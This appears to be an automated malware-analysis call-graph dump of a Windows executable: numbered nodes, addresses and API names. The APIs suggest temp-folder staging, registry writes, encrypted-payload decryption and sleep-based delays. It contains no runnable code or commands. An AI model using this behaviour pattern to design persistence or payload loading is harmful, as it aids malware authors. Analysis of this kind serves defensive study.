42367->42372 42373 40690e 42368->42373 43598 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42369->43598 42385 402390 39 API calls 42370->42385 42376 40655f 42371->42376 42387 402390 39 API calls 42372->42387 42377 408e00 43 API calls 42373->42377 42379 4066c8 42374->42379 42380 40664a 42375->42380 43565 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42376->43565 42382 406926 42377->42382 42395 402390 39 API calls 42379->42395 43574 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42380->43574 42389 408eb0 43 API calls 42382->42389 42383 406875 42383->42287 42390 402390 39 API calls 42383->42390 42392 4064aa 42385->42392 42386 406568 42393 402390 39 API calls 42386->42393 42388 4063f5 42387->42388 42388->42287 43551 407210 53 API calls 2 library calls 42388->43551 42394 40693b 42389->42394 42390->42287 42391 406653 42396 402390 39 API calls 42391->42396 42397 4064b8 42392->42397 42398 4064ae 42392->42398 42399 406570 42393->42399 42403 408e00 43 API calls 42394->42403 42404 4066dc 42395->42404 42405 40665b 42396->42405 43559 407520 53 API calls 2 library calls 42397->43559 43558 4074a0 53 API calls 2 library calls 42398->43558 43566 4077b0 53 API calls 2 library calls 42399->43566 42409 406953 42403->42409 42410 4066e0 42404->42410 42411 40675e 42404->42411 43575 407b60 53 API calls 2 library calls 42405->43575 42407 406575 42420 402460 43 API calls 42407->42420 42408 4064bd 42421 402460 43 API calls 42408->42421 42413 408eb0 43 API calls 42409->42413 43580 407d00 53 API calls 2 library calls 42410->43580 43586 407e80 53 API calls 2 library calls 42411->43586 42417 406968 42413->42417 42416 406660 42423 402460 43 API calls 42416->42423 42422 408e00 43 API calls 42417->42422 42418 406763 42427 402460 43 API calls 42418->42427 42419 4066e5 42428 402460 43 API calls 42419->42428 42424 406585 42420->42424 42425 4064cd 42421->42425 42426 406980 42422->42426 42429 406670 42423->42429 43567 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42424->43567 42441 402390 39 API calls 42425->42441 42431 402390 39 API calls 42426->42431 42432 406773 42427->42432 42433 4066f5 42428->42433 43576 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42429->43576 42436 40698e 42431->42436 42448 402390 39 API calls 42432->42448 43581 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42433->43581 42435 40658e 42440 402390 39 API calls 42435->42440 42437 402390 39 API calls 42436->42437 42442 406999 42437->42442 42439 406679 42444 402390 39 API calls 42439->42444 42445 406596 42440->42445 42446 4064e1 42441->42446 42447 402390 39 API calls 42442->42447 42443 4066fe 42449 402390 39 API calls 42443->42449 42450 406681 42444->42450 43568 407830 53 API calls 2 library calls 42445->43568 42446->42287 43560 4075b0 53 API calls 2 library calls 42446->43560 42452 4069a4 42447->42452 42453 406787 42448->42453 42454 406706 42449->42454 43577 407bf0 53 API calls 2 library calls 42450->43577 42458 402390 39 API calls 42452->42458 42459 40678b 42453->42459 42460 4067de 42453->42460 43582 407d80 53 API calls 2 library calls 42454->43582 42456 40659b 42469 402460 43 API calls 42456->42469 42463 4069af 42458->42463 43587 407f10 53 API calls 2 library calls 42459->43587 43592 4080d0 53 API calls 2 library calls 42460->43592 42462 406686 42472 402460 43 API calls 42462->42472 42467 402390 39 API calls 42463->42467 42465 40670b 42475 402460 43 API calls 42465->42475 42471 4069ba 42467->42471 42468 406790 42479 402460 43 API calls 42468->42479 42473 4065ab 42469->42473 42470 4067e3 42477 402460 43 API calls 42470->42477 42474 402390 39 API calls 42471->42474 42476 406696 42472->42476 42482 402390 39 API calls 42473->42482 42478 4069c5 42474->42478 42480 40671b 42475->42480 43578 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42476->43578 42483 4067f3 42477->42483 42484 402390 39 API calls 42478->42484 42485 4067a0 42479->42485 43583 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42480->43583 42488 4065bf 42482->42488 42499 402390 39 API calls 42483->42499 42489 4069d0 42484->42489 43588 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42485->43588 42487 40669f 42492 402390 39 API calls 42487->42492 42493 4065c8 42488->42493 43569 4078c0 53 API calls 2 library calls 42488->43569 42494 402390 39 API calls 42489->42494 42491 406724 42496 402390 39 API calls 42491->42496 42492->42287 43570 407940 53 API calls 2 library calls 42493->43570 42537 4069df 42494->42537 42495 4067a9 42501 402390 39 API calls 42495->42501 42497 40672c 42496->42497 43584 407e00 53 API calls 2 library calls 42497->43584 42504 406807 42499->42504 42502 4067b1 42501->42502 43589 407fd0 53 API calls 2 library calls 42502->43589 42504->42287 43593 408150 53 API calls 2 library calls 42504->43593 42505 4065d2 42511 402460 43 API calls 42505->42511 42507 406731 42512 402460 43 API calls 42507->42512 42508 4067b6 42515 402460 43 API calls 42508->42515 42510 406810 42519 402460 43 API calls 42510->42519 42513 4065e2 42511->42513 42516 406741 42512->42516 42520 402390 39 API calls 42513->42520 42514 406a3e Sleep 42514->42537 42517 4067c6 42515->42517 43585 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42516->43585 43590 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42517->43590 42523 406820 42519->42523 42524 4065f6 42520->42524 42522 40674a 42527 402390 39 API calls 42522->42527 43594 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42523->43594 42524->42287 43571 4079d0 53 API calls 2 library calls 42524->43571 42525 402460 43 API calls 42525->42537 42526 4067cf 42530 402390 39 API calls 42526->42530 42527->42287 42529 406829 42531 402390 39 API calls 42529->42531 42533 4067d7 42530->42533 42534 406831 42531->42534 43591 408050 53 API calls 2 library calls 42533->43591 43595 4081d0 53 API calls 2 library calls 42534->43595 42537->42514 42537->42525 42538 406a47 42537->42538 42544 406a36 42537->42544 42539 402390 39 API calls 42538->42539 42541 406a4f 42539->42541 42540 406836 42547 402460 43 API calls 42540->42547 42543 408c80 43 API calls 42541->42543 42542 4067dc 42545 402460 43 API calls 42542->42545 42546 406a60 42543->42546 42548 402390 39 API calls 42544->42548 42545->42369 42549 408c80 43 API calls 42546->42549 42550 406846 42547->42550 42548->42514 43596 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42550->43596 42554 40684f 42556 402390 39 API calls 42554->42556 42558 406857 42556->42558 43597 408250 53 API calls 2 library calls 42558->43597 42612 40b570 __CreateFrameInfo 42611->42612 42613 403d9b GetTempPathA 42612->42613 42614 403dd7 42613->42614 42614->42614 42615 402760 43 API calls 42614->42615 42623 403df3 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42615->42623 42618 409310 43 API calls 42618->42623 42619 403f22 CreateDirectoryA Sleep 42621 403f50 __CreateFrameInfo 42619->42621 42619->42623 42620 404f40 42622 40cfef 39 API calls 42620->42622 42625 409b8a 41 API calls 42621->42625 42624 404f63 42622->42624 42623->42618 42623->42619 42623->42620 43899 4106c1 42623->43899 43902 403c50 42623->43902 42626 410822 GetSystemTimeAsFileTime 42624->42626 42629 403f84 __CreateFrameInfo 42625->42629 42627 404fbf 42626->42627 42628 4106e2 39 API calls 42627->42628 42630 404fc8 __CreateFrameInfo 42628->42630 42634 40404b 42629->42634 43917 409cc5 6 API calls 42629->43917 42633 409b8a 41 API calls 42630->42633 42632 404002 42632->42634 43918 409fd7 42 API calls 42632->43918 42660 40501c __CreateFrameInfo std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42633->42660 42636 402760 43 API calls 42634->42636 42637 4040c2 42636->42637 42639 409310 43 API calls 42637->42639 42638 40403e 43919 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 42638->43919 42641 4040ed 42639->42641 42641->42620 42642 404167 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42641->42642 42646 404227 42642->42646 43920 409cc5 6 API calls 42642->43920 42645 4041d1 42645->42646 43921 409fd7 42 API calls 42645->43921 42649 402760 43 API calls 42646->42649 42647 402760 43 API calls 42647->42660 42652 404282 42649->42652 42655 409310 43 API calls 42652->42655 42653 409310 43 API calls 42653->42660 42654 40421a 43922 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 42654->43922 42657 4042a1 42655->42657 42659 401e50 44 API calls 42657->42659 42658 401e50 44 API calls 42658->42660 42668 404332 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42659->42668 42660->42647 42660->42653 42660->42658 42661 4058dd 42660->42661 42662 4052f0 Sleep 42660->42662 42666 4024a0 43 API calls 42660->42666 42672 405300 __CreateFrameInfo 42660->42672 43936 409cc5 6 API calls 42660->43936 43937 409fd7 42 API calls 42660->43937 43938 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 42660->43938 42663 40cfef 39 API calls 42661->42663 42662->42660 42665 4058e2 RegCreateKeyExA RegOpenKeyExA RegSetValueExA RegCloseKey 42663->42665 42664 404407 __CreateFrameInfo 42669 409b8a 41 API calls 42664->42669 42671 405984 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42665->42671 42666->42660 42668->42664 43908 402220 42668->43908 42678 40443b __CreateFrameInfo 42669->42678 42673 405a2a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42671->42673 42674 405a42 42671->42674 42680 409b8a 41 API calls 42672->42680 42676 409a17 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 42673->42676 42675 40cfef 39 API calls 42674->42675 42677 405a47 42675->42677 42679 405a3e 42676->42679 42682 410822 GetSystemTimeAsFileTime 42677->42682 42685 40451c 42678->42685 43923 409cc5 6 API calls 42678->43923 42679->41979 42703 405335 __InternalCxxFrameHandler __CreateFrameInfo std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42680->42703 42684 405a9f 42682->42684 42683 4044c6 42683->42685 43924 409fd7 42 API calls 42683->43924 42686 4106e2 39 API calls 42684->42686 42687 402760 43 API calls 42685->42687 42689 405aa8 Sleep 42686->42689 42690 40457d 42687->42690 42692 402760 43 API calls 42689->42692 42693 409310 43 API calls 42690->42693 42691 40450f 43925 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 42691->43925 42700 405ada 42692->42700 42702 4045a8 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42693->42702 42697 402760 43 API calls 42781 405ca0 __InternalCxxFrameHandler __CreateFrameInfo std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42697->42781 42699 402760 43 API calls 42699->42703 42701 405be6 __InternalCxxFrameHandler std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42700->42701 43942 4025d0 41 API calls 42700->43942 42701->42697 42701->42781 42708 4046e2 42702->42708 43926 409cc5 6 API calls 42702->43926 42703->42661 42703->42699 42707 409310 43 API calls 42703->42707 42714 401e50 44 API calls 42703->42714 42721 40fb4d 15 API calls ___std_exception_copy 42703->42721 42725 4056a2 42703->42725 42734 408c80 43 API calls 42703->42734 42737 4035d0 52 API calls 42703->42737 42746 402ee0 93 API calls 42703->42746 42780 403430 41 API calls 42703->42780 42810 4056a7 42703->42810 43939 409cc5 6 API calls 42703->43939 43940 409fd7 42 API calls 42703->43940 43941 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 42703->43941 42704 40468c 42704->42708 43927 409fd7 42 API calls 42704->43927 42707->42703 42710 402760 43 API calls 42708->42710 42711 40473d 42710->42711 42713 409310 43 API calls 42711->42713 42712 4046d5 43928 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 42712->43928 42717 40475c 42713->42717 42714->42703 42719 401e50 44 API calls 42717->42719 42718 403ab0 43 API calls 42718->42781 42722 4047ed std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42719->42722 42720 4107f2 43 API calls 42720->42781 42721->42703 42724 404d25 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42722->42724 42726 402220 8 API calls 42722->42726 42723 409b8a 41 API calls 42723->42781 42735 404de1 CoUninitialize 42724->42735 42727 40579c CoUninitialize 42725->42727 42728 4048d8 SHGetFolderPathA 42726->42728 42738 4057b2 42727->42738 42728->42724 42730 4048f5 42728->42730 42729 4061e5 42731 406c40 53 API calls 42729->42731 42742 40497a 42730->42742 43929 409cc5 6 API calls 42730->43929 42732 40620c 42731->42732 42740 402460 43 API calls 42732->42740 42734->42703 42751 404df1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42735->42751 42737->42703 42747 4057ce CoUninitialize 42738->42747 42739 404931 42739->42742 43930 409fd7 42 API calls 42739->43930 42744 40621c 42740->42744 42745 402760 43 API calls 42742->42745 42753 402390 39 API calls 42744->42753 42756 4049dd 42745->42756 42746->42703 42760 4057db std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42747->42760 42748 40496d 43931 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 42748->43931 42750 409310 43 API calls 42750->42781 42754 404e62 CoUninitialize 42751->42754 42755 406230 42753->42755 42772 404e72 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42754->42772 42758 406305 42755->42758 42759 406238 42755->42759 42775 404a11 __InternalCxxFrameHandler std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42756->42775 43932 4095d0 43 API calls 4 library calls 42756->43932 42757 4058b5 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42761 409a17 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 42757->42761 43959 406ee0 53 API calls 2 library calls 42758->43959 42770 4062a8 42759->42770 42771 40624b 42759->42771 42760->42661 42760->42757 42765 4058d6 42761->42765 42763 40cfef 39 API calls 42763->42781 42765->41979 42766 401e50 44 API calls 42766->42781 42767 409a17 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 42773 404f39 42767->42773 42768 40630a 42785 402460 43 API calls 42768->42785 42769 404be3 CoInitialize CoCreateInstance 42769->42724 42808 404c88 42769->42808 43954 406dd0 53 API calls 2 library calls 42770->43954 43949 406cc0 53 API calls 2 library calls 42771->43949 42772->42767 42773->41979 42774 4061b2 Sleep 42774->42781 42775->42769 43933 409cc5 6 API calls 42775->43933 42780->42703 42781->42718 42781->42720 42781->42723 42781->42729 42781->42750 42781->42763 42781->42766 42781->42774 42786 402760 43 API calls 42781->42786 42792 4061be 42781->42792 42803 406c2b 42781->42803 42804 4061a8 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42781->42804 43943 4025d0 41 API calls 42781->43943 43944 409cc5 6 API calls 42781->43944 43945 409fd7 42 API calls 42781->43945 43946 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 42781->43946 42782 4062ad 42789 402460 43 API calls 42782->42789 42783 404ba7 42783->42769 43934 409fd7 42 API calls 42783->43934 42784 406250 42791 402460 43 API calls 42784->42791 42787 40631a 42785->42787 42786->42781 42796 402390 39 API calls 42787->42796 42793 4062bd 42789->42793 42790 404bd6 43935 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 42790->43935 42795 406260 42791->42795 43947 408c50 43 API calls 42792->43947 43955 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42793->43955 43950 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42795->43950 42800 40632e 42796->42800 42801 406404 42800->42801 42802 406336 42800->42802 43968 407290 53 API calls 2 library calls 42801->43968 43960 406f60 53 API calls 2 library calls 42802->43960 42815 403c40 21 API calls 42803->42815 42804->42774 42805 4062c6 42811 402390 39 API calls 42805->42811 42806 4061ca 42812 402390 39 API calls 42806->42812 42807 406269 42814 402390 39 API calls 42807->42814 42826 404cd5 MultiByteToWideChar 42808->42826 42827 404d03 CoUninitialize 42808->42827 42817 40573b Sleep 42810->42817 42828 40576a Sleep 42810->42828 43187 10001f20 75 API calls 42810->43187 43188 100010a3 CoUninitialize 42810->43188 42818 4062ce 42811->42818 42819 4061d2 42812->42819 42821 406271 42814->42821 42822 406c30 42815->42822 42816 40633b 42832 402460 43 API calls 42816->42832 42817->42725 42817->42810 43956 406e60 53 API calls 2 library calls 42818->43956 42824 402390 39 API calls 42819->42824 42820 406409 42834 402460 43 API calls 42820->42834 43951 406d50 53 API calls 2 library calls 42821->43951 42830 4061da 42824->42830 42826->42827 42827->42724 42828->42725 42829 4062d3 42839 402460 43 API calls 42829->42839 43948 401800 CoUninitialize 42830->43948 42831 406276 42840 402460 43 API calls 42831->42840 42836 40634b 42832->42836 42837 406419 42834->42837 43961 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42836->43961 42846 402390 39 API calls 42837->42846 42842 4062e3 42839->42842 42843 406286 42840->42843 42841 406354 42844 402390 39 API calls 42841->42844 43957 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42842->43957 43952 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42843->43952 42848 40635c 42844->42848 42850 40642d 42846->42850 43962 406ff0 53 API calls 2 library calls 42848->43962 42849 4062ec 42853 402390 39 API calls 42849->42853 42854 4064ee 42850->42854 43969 407310 53 API calls 2 library calls 42850->43969 42851 40628f 42855 402390 39 API calls 42851->42855 42860 4062f4 42853->42860 43977 407630 53 API calls 2 library calls 42854->43977 42857 406297 42855->42857 43953 408c50 43 API calls 42857->43953 42858 406361 42866 402460 43 API calls 42858->42866 43958 408c50 43 API calls 42860->43958 42861 40643a 42867 402460 43 API calls 42861->42867 42863 4064f8 42869 402460 43 API calls 42863->42869 42865 4062a3 42870 40688e 42865->42870 44015 402360 43 API calls 42865->44015 42868 406371 42866->42868 42871 40644a 42867->42871 43963 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42868->43963 42873 406508 42869->42873 42875 4017a0 41 API calls 42870->42875 43970 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42871->43970 42885 402390 39 API calls 42873->42885 42878 4068a1 42875->42878 42877 40637a 42881 402390 39 API calls 42877->42881 42879 4083f0 53 API calls 42878->42879 42882 4068aa 42879->42882 42880 406453 42883 402390 39 API calls 42880->42883 42884 406382 42881->42884 42892 402460 43 API calls 42882->42892 42886 40645b 42883->42886 43964 407070 53 API calls 2 library calls 42884->43964 42888 40651c 42885->42888 43971 407390 53 API calls 2 library calls 42886->43971 42891 406603 42888->42891 43978 4076b0 53 API calls 2 library calls 42888->43978 42890 406387 42900 402460 43 API calls 42890->42900 43988 407a50 53 API calls 2 library calls 42891->43988 42896 4068bd 42892->42896 42893 406460 42902 402460 43 API calls 42893->42902 42899 408370 53 API calls 42896->42899 42897 40660d 42906 402460 43 API calls 42897->42906 42898 406529 42904 402460 43 API calls 42898->42904 42901 4068c8 42899->42901 42903 406397 42900->42903 42911 402460 43 API calls 42901->42911 42905 406470 42902->42905 42913 402390 39 API calls 42903->42913 42907 406539 42904->42907 43972 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42905->43972 42909 40661d 42906->42909 43979 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42907->43979 42918 402390 39 API calls 42909->42918 42915 4068db 42911->42915 42912 406479 42916 402390 39 API calls 42912->42916 42917 4063ab 42913->42917 42914 406542 42919 402390 39 API calls 42914->42919 42920 4082d0 53 API calls 42915->42920 42921 406481 42916->42921 42922 4063cc 42917->42922 42923 4063af 42917->42923 42925 406631 42918->42925 42926 40654a 42919->42926 42928 4068e6 42920->42928 43973 407410 53 API calls 2 library calls 42921->43973 43966 407180 53 API calls 2 library calls 42922->43966 43965 407100 53 API calls 2 library calls 42923->43965 42931 4066b3 42925->42931 42932 406635 42925->42932 43980 407730 53 API calls 2 library calls 42926->43980 42941 402460 43 API calls 42928->42941 42930 4063b4 42942 402460 43 API calls 42930->42942 43995 407c70 53 API calls 2 library calls 42931->43995 43989 407ae0 53 API calls 2 library calls 42932->43989 42934 4063d1 42943 402460 43 API calls 42934->42943 42935 406486 42945 402460 43 API calls 42935->42945 42938 40654f 42947 402460 43 API calls 42938->42947 42939 4066b8 42951 402460 43 API calls 42939->42951 42940 40663a 42952 402460 43 API calls 42940->42952 42944 4068f9 42941->42944 42946 4063c4 42942->42946 42948 4063e1 42943->42948 42949 408da0 43 API calls 42944->42949 42950 406496 42945->42950 44014 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42946->44014 42953 40655f 42947->42953 42962 402390 39 API calls 42948->42962 42954 40690e 42949->42954 42965 402390 39 API calls 42950->42965 42955 4066c8 42951->42955 42956 40664a 42952->42956 43981 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42953->43981 42959 408e00 43 API calls 42954->42959 42972 402390 39 API calls 42955->42972 43990 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42956->43990 42964 406926 42959->42964 42961 406568 42967 402390 39 API calls 42961->42967 42968 4063f5 42962->42968 42963 406875 42963->42865 42969 402390 39 API calls 42963->42969 42970 408eb0 43 API calls 42964->42970 42971 4064aa 42965->42971 42966 406653 42973 402390 39 API calls 42966->42973 42974 406570 42967->42974 42968->42865 43967 407210 53 API calls 2 library calls 42968->43967 42969->42865 42975 40693b 42970->42975 42976 4064b8 42971->42976 42977 4064ae 42971->42977 42979 4066dc 42972->42979 42980 40665b 42973->42980 43982 4077b0 53 API calls 2 library calls 42974->43982 42983 408e00 43 API calls 42975->42983 43975 407520 53 API calls 2 library calls 42976->43975 43974 4074a0 53 API calls 2 library calls 42977->43974 42986 4066e0 42979->42986 42987 40675e 42979->42987 43991 407b60 53 API calls 2 library calls 42980->43991 42990 406953 42983->42990 42985 4064bd 42998 402460 43 API calls 42985->42998 43996 407d00 53 API calls 2 library calls 42986->43996 44002 407e80 53 API calls 2 library calls 42987->44002 42989 406575 42999 402460 43 API calls 42989->42999 42993 406660 43002 402460 43 API calls 42993->43002 42995 406763 43005 402460 43 API calls 42995->43005 42996 4066e5 43006 402460 43 API calls 42996->43006 43001 4064cd 42998->43001 43003 406585 42999->43003 43016 402390 39 API calls 43001->43016 43007 406670 43002->43007 43983 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 43003->43983 43010 406773 43005->43010 43011 4066f5 43006->43011 43992 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 43007->43992 43026 402390 39 API calls 43010->43026 43997 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 43011->43997 43013 40658e 43019 402390 39 API calls 43013->43019 43021 4064e1 43016->43021 43018 406679 43023 402390 39 API calls 43018->43023 43021->42865 43022 4066fe 43027 402390 39 API calls 43022->43027 43032 406787 43026->43032 43033 406706 43027->43033 43037 40678b 43032->43037 43038 4067de 43032->43038 43187->42810 43188->42810 43191->41632 43192->41632 43193->41632 43195 409398 43194->43195 43198 40932a __InternalCxxFrameHandler 43194->43198 44043 4095d0 43 API calls 4 library calls 43195->44043 43197 4093aa 43197->41632 43198->41632 43200 401ea0 43199->43200 43200->43200 43201 402760 43 API calls 43200->43201 43202 401eb3 43201->43202 43203 402760 43 API calls 43202->43203 43204 401ff1 __InternalCxxFrameHandler 43203->43204 44044 40d0f0 43204->44044 43207 402129 43209 4021c8 43207->43209 43210 402199 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 43207->43210 43208 409a17 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 43211 4021bd 43208->43211 43212 40cfef 39 API calls 43209->43212 43210->43208 43211->41632 43213 4021cd 43212->43213 43214 401e50 43 API calls 43213->43214 43215->41650 43217->41635 43218->41651 43219->41671 43220->41691 43221->41909 43222->41633 43223->41654 43224->41672 43225->41688 43226->41909 43227->41626 43228->41661 43229->41682 43230->41699 43231->41714 43232->41727 43233->41776 43234->41771 43235->41776 43236->41663 43237->41700 43238->41719 43239->41731 43240->41747 43241->41769 43242->41776 43243->41823 43244->41878 43245->41702 43246->41735 43247->41752 43248->41774 43249->41801 43250->41822 43251->41850 43252->41871 43253->41910 43254->41922 43255->41952 43256->41734 43257->41778 43258->41806 43259->41831 43260->41854 43261->41877 43262->41903 43263->41777 43264->41834 43265->41858 43266->41881 43267->41907 43268->41924 43269->41939 43270->41833 43271->41884 43272->41912 43273->41925 43274->41943 43275->41960 43276->41886 43277->41927 43278->41946 43279->41958 43280->41972 43281->41960 43282->41798 43283->41708 43284->41982 43285->41995 43287->41992 43288->42004 43289->42018 43290->42022 43291->42026 43293 4106ab 21 API calls 43292->43293 43294 403c47 43293->43294 43296 4128fe 43295->43296 43297 4128f8 43295->43297 43301 412902 43296->43301 43325 4135e5 6 API calls __dosmaperr 43296->43325 43324 4135a6 6 API calls __dosmaperr 43297->43324 43300 41291a 43300->43301 43302 412922 43300->43302 43303 412987 SetLastError 43301->43303 43326 413294 14 API calls __dosmaperr 43302->43326 43306 405aa8 Sleep 43303->43306 43307 412997 43303->43307 43305 41292f 43308 412937 43305->43308 43309 412948 43305->43309 43306->41601 43337 411109 39 API calls __CreateFrameInfo 43307->43337 43327 4135e5 6 API calls __dosmaperr 43308->43327 43328 4135e5 6 API calls __dosmaperr 43309->43328 43314 412945 43330 4132f1 43314->43330 43315 412954 43316 412958 43315->43316 43317 41296f 43315->43317 43329 4135e5 6 API calls __dosmaperr 43316->43329 43336 412710 14 API calls __dosmaperr 43317->43336 43321 41297a 43323 4132f1 ___free_lconv_mon 14 API calls 43321->43323 43322 41296c 43322->43303 43323->43322 43324->43296 43325->43300 43326->43305 43327->43314 43328->43315 43329->43314 43331 4132fc RtlFreeHeap 43330->43331 43335 413326 43330->43335 43332 413311 GetLastError 43331->43332 43331->43335 43333 41331e __dosmaperr 43332->43333 43338 40d0dd 14 API calls __dosmaperr 43333->43338 43335->43322 43336->43321 43338->43335 43339->42033 43340->42041 43341->42053 43342->42056 43343->42049 43344->42074 43345->42077 43346->42079 43347->42086 43348->42088 43349->42081 43350->42095 43351->42097 43352->42099 43353->42107 43355 409173 43354->43355 43356 4092fd 43355->43356 43357 40923d 43355->43357 43363 409178 __InternalCxxFrameHandler 43355->43363 43373 401600 43 API calls 3 library calls 43356->43373 43361 409272 43357->43361 43362 409298 43357->43362 43359 409302 43374 401560 41 API calls 3 library calls 43359->43374 43361->43359 43364 40927d 43361->43364 43370 40928a __InternalCxxFrameHandler 43362->43370 43372 401560 41 API calls 4 library calls 43362->43372 43363->42110 43371 401560 41 API calls 4 library calls 43364->43371 43366 40cfef 39 API calls 43368 40930c 43366->43368 43369 409283 43369->43366 43369->43370 43370->42110 43371->43369 43372->43370 43373->43359 43374->43369 43375->42121 43376->42127 43377->42116 43378->42121 43380 4024e4 43379->43380 43381 4024be __InternalCxxFrameHandler 43379->43381 43382 4025c4 43380->43382 43385 40251f 43380->43385 43387 402553 43380->43387 43381->42140 43610 401600 43 API calls 3 library calls 43382->43610 43384 4025c9 43611 401560 41 API calls 3 library calls 43384->43611 43385->43384 43608 401560 41 API calls 4 library calls 43385->43608 43392 40253f __InternalCxxFrameHandler 43387->43392 43609 401560 41 API calls 4 library calls 43387->43609 43389 4025ce 43391 40cfef 39 API calls 43391->43382 43392->43391 43393 4025a6 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 43392->43393 43393->42140 43395 40371a GetLastError CryptReleaseContext 43394->43395 43396 40365e CryptCreateHash 43394->43396 43400 403864 43395->43400 43396->43395 43397 403682 43396->43397 43401 409b8a 41 API calls 43397->43401 43398 40388a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 43399 409a17 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 43398->43399 43402 4038ae 43399->43402 43400->43398 43403 4038b2 43400->43403 43404 4036ba 43401->43404 43402->42186 43405 40cfef 39 API calls 43403->43405 43612 40fd1f 43404->43612 43407 4038b7 43405->43407 43407->42186 43409 4036f6 CryptDeriveKey 43409->43395 43411 403735 43409->43411 43410 4036e8 GetLastError 43410->43400 43412 40fb4d ___std_exception_copy 15 API calls 43411->43412 43413 40373b __InternalCxxFrameHandler 43412->43413 43414 409b8a 41 API calls 43413->43414 43417 40375a __InternalCxxFrameHandler 43414->43417 43415 403858 CryptDestroyKey 43415->43400 43416 4037cc CryptDecrypt 43416->43415 43416->43417 43417->43415 43417->43416 43419 402f00 SetLastError 43418->43419 43420 402f28 43418->43420 43667 402a20 70 API calls 43419->43667 43422 402f69 SetLastError 43420->43422 43430 402f32 43420->43430 43436 402f91 43420->43436 43669 402a20 70 API calls 43422->43669 43423 402f12 43426 409a17 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 43423->43426 43429 402f24 43426->43429 43427 402f3c SetLastError 43431 409a17 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 43427->43431 43428 402f7b 43432 409a17 